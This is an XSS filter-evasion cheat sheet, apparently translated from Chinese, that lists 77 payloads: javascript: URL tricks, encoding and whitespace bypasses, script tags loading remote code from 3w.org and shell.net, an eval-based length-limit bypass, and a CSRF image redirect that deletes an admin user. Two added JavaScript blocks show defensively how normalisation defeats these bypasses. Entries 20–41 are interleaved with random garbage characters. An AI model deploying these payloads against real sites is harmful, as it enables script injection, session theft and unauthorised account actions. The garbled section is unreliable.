Cross-site image shell

XSS code: <script>alert("")</script>

Put the script on the first line of the webshell file and save it with a .jpg extension. When the "image" is opened directly, a browser that sniffs content (old Internet Explorer) renders it as HTML and the script runs. Note that the server does not execute the file; this yields only XSS in the visitor's browser, and serving the upload with a correct image Content-Type plus X-Content-Type-Options: nosniff stops it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a javascript: URL
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required here)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (use the XSS calculator to produce the codes)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Long UTF-8 Unicode encoding (use the XSS calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (use the XSS calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (use the XSS calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the word "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded HTML-encoded tab, splitting the word "javascript"
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a length limit (all pieces must be on the same page). Each fragment fits under the limit on its own; the concatenated string is handed to eval at the end.
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2. Null-byte tricks are of little use on domestic sites, since there is rarely a place to apply them; only old Internet Explorer tolerated a NUL inside a tag name.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG SRC
<IMG SRC=" javascript:alert('XSS');">
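Entries (4), (5) and (9) through (19) all hide the same thing, a javascript: scheme in a URL attribute, and they work because the browser normalises the attribute before reading its scheme while a naive filter compares the raw text. The following is an added example, not code from the original sheet: a normaliser that models that lenient browser behaviour (numeric entity decoding with optional semicolons, removal of tab, newline, carriage return and NUL, stripping of leading whitespace, case folding) next to the literal-substring filter it defeats. The function names, the allow/deny logic and the entity-encoded payloads are constructed for this example; the entity forms are rebuilt here because this copy of the page shows them already decoded, and the NUL case is legacy-only, since modern browsers no longer honour a NUL inside the scheme.

```javascript
// Added example (not from the original sheet): why a literal "javascript:"
// filter misses entries (4), (5), (9)-(14) and (17) while a normalised check
// does not. The lenient decoding below models old browser behaviour; the
// NUL case (17) is legacy-only.

// Decode numeric character references, with or without the trailing
// semicolon ("&#106;", "&#106", "&#x6A", "&#X6A;"), as entries (5), (9)
// and (10) rely on. Named references are out of scope here.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// Normalise a URL-valued attribute the way a lenient parser did before
// reading the scheme:
//   - decode entities first (entry (12): an encoded tab becomes a real tab)
//   - drop tab, LF and CR anywhere (entries (11)-(14)); NUL for old IE (17)
//   - strip leading whitespace and control characters (entry (19); the
//     wider set listed in entry (47) is approximated here)
//   - case-fold the scheme (entry (4))
function normaliseUrlAttr(value) {
  let v = decodeNumericEntities(value);
  v = v.replace(/[\u0000\t\n\r]/g, '');
  v = v.replace(/^[\u0001-\u0020\u00a0\u2000-\u200b\u3000\ufeff]+/, '');
  return v.toLowerCase();
}

const SCRIPT_SCHEMES = ['javascript:', 'vbscript:', 'data:'];

// The check a server-side filter should make: normalise, then inspect the
// scheme that results.
function isScriptScheme(value) {
  const v = normaliseUrlAttr(value);
  return SCRIPT_SCHEMES.some((s) => v.startsWith(s));
}

// The check many filters actually made: a literal substring match.
function naiveFilterBlocks(value) {
  return value.includes('javascript:');
}

// Constructed attribute values following the sheet's entries.
const PAYLOADS = [
  "javascript:alert('XSS')",                                                     // (3)
  "JaVaScRiPt:alert('XSS')",                                                     // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  // (5) decimal entities
  "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",             // (9) no semicolons
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",        // (10) hex entities
  "jav\tascript:alert('XSS')",                                                   // (11) embedded tab
  "jav&#x09;ascript:alert('XSS')",                                               // (12) encoded tab
  "jav\nascript:alert('XSS')",                                                   // (13) newline
  "jav\rascript:alert('XSS')",                                                   // (14) carriage return
  "java\u0000script:alert('XSS')",                                               // (17) NUL (legacy IE)
  " \t javascript:alert('XSS')",                                                 // (19) leading whitespace
  'http://3w.org/XSS/xss.js',                                                    // benign control
];

// Run both checks over the list; returns one row per payload.
function evaluate(payloads = PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    naive: naiveFilterBlocks(p),
    normalised: isScriptScheme(p),
  }));
}

// Stand-alone run: shows which filter catches which payload.
for (const row of evaluate()) {
  console.log(`naive=${row.naive ? 'blocked' : 'MISSED '} normalised=${row.normalised ? 'blocked' : 'allowed'} ${JSON.stringify(row.payload)}`);
}
```

Of the twelve constructed inputs the literal check stops only (3) and (19); the normalised check stops every one except the benign URL. The lesson for a filter author is that the decoding order matters: entities must be decoded before the control characters are stripped, or entry (12) slips through.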
2 J% k [0 o* m4 J8 x( `9 U(20)Non-alpha-non-digit XSS
3 `4 L, b: L9 d<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; @, f, K+ A8 b9 W6 \
. ^4 k6 x. W$ x" I0 u(21)Non-alpha-non-digit XSS to 2
5 [* y6 m: ]7 ?2 C- f<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
V, a8 B# y/ X- ~' R
8 P: Y! Z8 q4 v4 s(22)Non-alpha-non-digit XSS to 3
* q5 Z( P) F, D8 q |" a0 K<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, ~ a2 U. m7 X6 ^
0 y; ^$ P% [- Y8 |* @, K
(23)双开括号
% Z3 ]$ c8 m1 d& N: ~: p9 I<<SCRIPT>alert(“XSS”);//<</SCRIPT> S1 D* d* o, m' s
# S1 v& q" ]( k# C. I/ {(24)无结束脚本标记(仅火狐等浏览器)
9 p, V# R. G+ [7 N( r e! J0 W# H<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ W7 v' ^5 \; X; w3 ~0 ?! j# u( L* @
/ ?; g) v) U0 b
(25)无结束脚本标记2 f" W' ]; k; y. J* S0 L
<SCRIPT SRC=//3w.org/XSS/xss.js>' N, N& x ~, x$ R* z+ f
4 b; X' { @/ y& D
(26)半开的HTML/JavaScript XSS* v# I t% @ Y9 c3 Y: v. a% R* o8 z
<IMG SRC=”javascript:alert(‘XSS’)”
' l+ i6 R4 c% x! t
) s: K/ r7 L4 d! x(27)双开角括号
# f, N1 G) O4 x* f9 f$ `1 ~' I<iframe src=http://3w.org/XSS.html <
- {0 l! }; y5 C1 c" o- Z, |0 S h8 p7 s& u3 N
(28)无单引号 双引号 分号
$ j4 Q5 l0 G+ E8 k' ]8 `<SCRIPT>a=/XSS/. [( B9 Q/ T& l g" r. `
alert(a.source)</SCRIPT>& C: M+ @' }( ]5 y E
6 Q: O! I! {: v# U) ^) R' u
(29)换码过滤的JavaScript2 e' D: E7 W% i3 ]% V
\”;alert(‘XSS’);//, k% @ |! q) |' @
n0 i; Q6 G: c9 e T(30)结束Title标签
: O+ V: R, Z: H6 T4 e- ^</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 e' M4 |' U. d! ^' S! ]# s) `( R0 t! f
(31)Input Image: E! I2 e7 Y. M3 j1 o& O: H0 k
<INPUT SRC=”javascript:alert(‘XSS’);”>) } C$ D" {0 C4 _2 m2 `5 Q A
7 o& M( Y6 ~; G' U6 e) W% V. l
(32)BODY Image
; m- f6 O8 G6 [" R$ N<BODY BACKGROUND=”javascript:alert(‘XSS’)”># A# w4 ]0 N+ b5 H
2 T5 H' Z; L% W5 u4 t(33)BODY标签
& P% A/ z# }9 m$ B+ G* f<BODY(‘XSS’)>! \$ T) Y' W' n
0 y3 ~: I- o0 { @(34)IMG Dynsrc
* O; F6 _" o+ d6 [4 i<IMG DYNSRC=”javascript:alert(‘XSS’)”>: [. p1 M0 s5 V* J
9 |, m) b! N1 ]: f& a, L. R9 M
(35)IMG Lowsrc
8 J9 h) z) C7 i' O1 l% x4 ^* \% U<IMG LOWSRC=”javascript:alert(‘XSS’)”>
- g j1 P7 U( G
* v- m' y! d; b5 v(36)BGSOUND
w. ~% l, ?, D6 q; e<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 f! v2 H! ~4 r d) l+ @3 e) `8 E4 D( S; M5 ^
(37)STYLE sheet& Y+ E9 D- ~ J, z4 }) f7 t; v( y
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 s7 f6 k3 ]8 [6 X# L& }" D" P
h9 L; }. E. g: V7 C8 M% @/ h
(38)远程样式表# `8 k3 ~5 f7 v: Y* o6 x; ~7 t
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( q/ ~7 U" C: U1 z4 g
- H$ P( `' U+ N3 U(39)List-style-image(列表式)& S' ^% O; m; Y5 p+ r2 j _$ J
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- g7 T2 c4 A+ K! G' _- x! q7 V- n4 b# v+ j/ t" h
(40)IMG VBscript8 z' F3 R( o3 b; z
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 z" L7 s( L- ~) w1 }/ y
" u* o2 k2 R+ l) B(41)META链接url8 T5 o) W# P7 Q0 B$ b
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
' m" z) O+ ^ @4 b$ Q8 y H# S% Q2 O' _3 y0 G4 b& H
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters before the URL (code points 1-32&34&39&160&8192-8&13&12288&65279 are tolerated)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (anything that starts with an angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE variant (comment-obfuscated expression)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Inside the Flash file, ActionScript can assemble your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must sit on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, serve the script from a file with an image extension
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command: the image request performs a GET action on the target site with the viewer's session (a CSRF, not script execution)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command, with a.jpg on your own server: the page embeds the image and your web server redirects the request to the admin action
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass (IP address instead of host name)
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (shown here already decoded)
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Dropping "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
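Entries (70) through (77) defeat filters that inspect the raw href string. The browser, by contrast, resolves the link first, and every one of those spellings collapses to a single canonical host. The following is an added example, not code from the original sheet: it uses Node's WHATWG URL parser, which applies the same rules browsers do (tab and newline removal, decimal/hex/octal IPv4 parsing, relative resolution), to canonicalise a link before applying a host allow-list and deny-list, beside the raw substring check that misses the obfuscated forms. The deny-list host 192.168.0.1 (which is what entries (70), (71) and (72) encode), the allow-list, the page origin and all function names are constructed for this example.

```javascript
// Added example (not from the original sheet): canonicalising link targets
// before a host-based check. Node's WHATWG URL parser strips tab/newline,
// parses decimal/hex/octal IPv4 literals and resolves relative links, so
// the spellings in entries (70)-(76) collapse to one host. The lists and
// the page origin below are constructed.

const BLOCKED_HOSTS = new Set(['192.168.0.1']);     // constructed deny-list (an internal host)
const ALLOWED_HOSTS = new Set(['www.google.com']);   // constructed allow-list for outbound links
const PAGE_BASE = 'https://app.example.test/';       // assumed origin of the page carrying the link

// Resolve href as the browser would and return its canonical host, or null
// when the link is not http(s) (the javascript: link of entry (77)) or does
// not parse at all.
function canonicalHost(href, base = PAGE_BASE) {
  let url;
  try {
    url = new URL(href, base);
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  // An absolute DNS name with a trailing dot (entry (76)) names the same zone.
  return url.hostname.replace(/\.$/, '');
}

// The string check a filter might make against the raw href: misses every
// encoded form of the blocked address.
function naiveBlocked(href) {
  return [...BLOCKED_HOSTS].some((h) => href.includes(h));
}

// Decision on the canonical host: must parse, must not be denied, must be
// on the allow-list.
function isSafeLink(href) {
  const host = canonicalHost(href);
  return host !== null && !BLOCKED_HOSTS.has(host) && ALLOWED_HOSTS.has(host);
}

// Constructed hrefs following entries (70)-(77).
const LINKS = [
  'http://3232235521/',                                     // (70) decimal IP
  'http://0xc0.0xa8.0x00.0x01/',                            // (71) hex IP
  'http://0300.0250.0000.0001/',                            // (72) octal IP
  'h\ntt\tp://6\t6.000146.0x7.147/',                        // (73) mixed, with embedded tab and newline
  '//www.google.com/',                                      // (74) protocol-relative
  'http://google.com/',                                     // (75) without www
  'http://www.google.com./',                                // (76) trailing dot
  "javascript:document.location='http://www.google.com/'", // (77) javascript: link
];

// One row per link: what the raw check saw, what the browser would resolve,
// and the final decision.
function summarise(links = LINKS) {
  return links.map((href) => ({
    href,
    naiveBlocked: naiveBlocked(href),
    host: canonicalHost(href),
    safe: isSafeLink(href),
  }));
}

// Stand-alone run.
for (const row of summarise()) {
  console.log(`${row.safe ? 'ALLOW' : 'DENY '} host=${row.host} naiveBlocked=${row.naiveBlocked} ${JSON.stringify(row.href)}`);
}
```

The raw check blocks none of the three encodings of 192.168.0.1, while the canonical check denies all three, resolves the mixed form (73) to 66.102.7.147, rejects the javascript: link outright, and allows only (74) and (76), which both resolve to the allow-listed host. Matching on the parsed host rather than the string is the whole fix.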